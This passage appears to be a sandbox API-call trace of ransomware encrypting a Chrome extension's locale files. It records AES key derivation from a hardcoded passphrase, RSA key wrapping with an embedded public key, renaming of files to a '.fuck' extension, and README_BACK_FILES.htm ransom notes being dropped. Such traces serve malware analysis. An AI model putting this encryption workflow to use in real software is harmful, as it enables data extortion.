lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e123c0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.823] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xdd, lpOverlapped=0x0) returned 1 [0255.825] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xdd, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0255.825] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0255.825] CloseHandle (hObject=0x5d60) returned 1 [0255.825] CloseHandle (hObject=0x5d5c) returned 1 [0255.825] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json"), bFailIfExists=0) returned 1 [0255.829] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json", dwFileAttributes=0x0) returned 1 [0255.829] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.gsg")) returned 1 [0255.830] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.fuck")) returned 1 [0255.832] CryptDestroyHash (hHash=0x2e186a8) returned 1 [0255.832] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.832] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.832] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.832] FindClose (in: hFindFile=0x2e18828 | out: hFindFile=0x2e18828) returned 1 [0255.832] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\readme_back_files.htm")) returned 0xffffffff [0255.832] AreFileApisANSI () returned 1 [0255.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.832] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.833] GetFileType (hFile=0x5d50) returned 0x1 [0255.833] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.834] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.834] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18828 [0255.834] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.834] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.834] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.835] GetLastError () returned 0x0 [0255.835] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json")) returned 0x20 [0255.835] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json", dwFileAttributes=0x80) returned 1 [0255.835] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.836] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.837] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.837] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.839] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.839] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0255.839] CryptHashData (hHash=0x2e186a8, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.839] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e186a8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.840] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.840] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.840] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e12558) returned 1 [0255.840] CryptImportPublicKeyInfo (in: hCryptProv=0x2e12558, dwCertEncodingType=0x1, pInfo=0x2e2a720*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2a750*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2a758*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19628) returned 1 [0255.841] CryptEncrypt (in: hKey=0x2e19628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.841] CryptEncrypt (in: hKey=0x2e19628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e12448*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e12448*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.841] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e12448*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e12448*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.842] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xb0, lpOverlapped=0x0) returned 1 [0255.843] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xb0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0255.843] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0255.843] CloseHandle (hObject=0x5d5c) returned 1 [0255.843] CloseHandle (hObject=0x5d60) returned 1 [0255.843] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json"), bFailIfExists=0) returned 1 [0255.846] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json", dwFileAttributes=0x0) returned 1 [0255.846] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json.gsg")) returned 1 [0255.847] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json.fuck")) returned 1 [0255.848] CryptDestroyHash (hHash=0x2e186a8) returned 1 [0255.849] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.849] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.849] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.849] FindClose (in: hFindFile=0x2e18828 | out: hFindFile=0x2e18828) returned 1 [0255.849] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\readme_back_files.htm")) returned 0xffffffff [0255.849] AreFileApisANSI () returned 1 [0255.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0255.849] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.850] GetFileType (hFile=0x5d50) returned 0x1 [0255.850] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.851] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.851] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18828 [0255.853] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.853] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.853] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.853] GetLastError () returned 0x0 [0255.853] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json")) returned 0x20 [0255.853] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json", dwFileAttributes=0x80) returned 1 [0255.854] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.854] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.855] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.855] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.857] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.857] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0255.857] CryptHashData (hHash=0x2e186a8, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.857] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e186a8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.857] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.857] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.857] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e12998) returned 1 [0255.858] CryptImportPublicKeyInfo (in: hCryptProv=0x2e12998, dwCertEncodingType=0x1, pInfo=0x2e28ec0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e28ef0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e28ef8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e190e8) returned 1 [0255.858] CryptEncrypt (in: hKey=0x2e190e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.858] CryptEncrypt (in: hKey=0x2e190e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e12910*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e12910*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.858] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e12910*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e12910*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.859] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xd2, lpOverlapped=0x0) returned 1 [0255.860] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd2, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0255.860] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0255.860] CloseHandle (hObject=0x5d60) returned 1 [0255.860] CloseHandle (hObject=0x5d5c) returned 1 [0255.861] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json"), bFailIfExists=0) returned 1 [0255.864] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json", dwFileAttributes=0x0) returned 1 [0255.864] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json.gsg")) returned 1 [0255.865] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json.fuck")) returned 1 [0255.867] 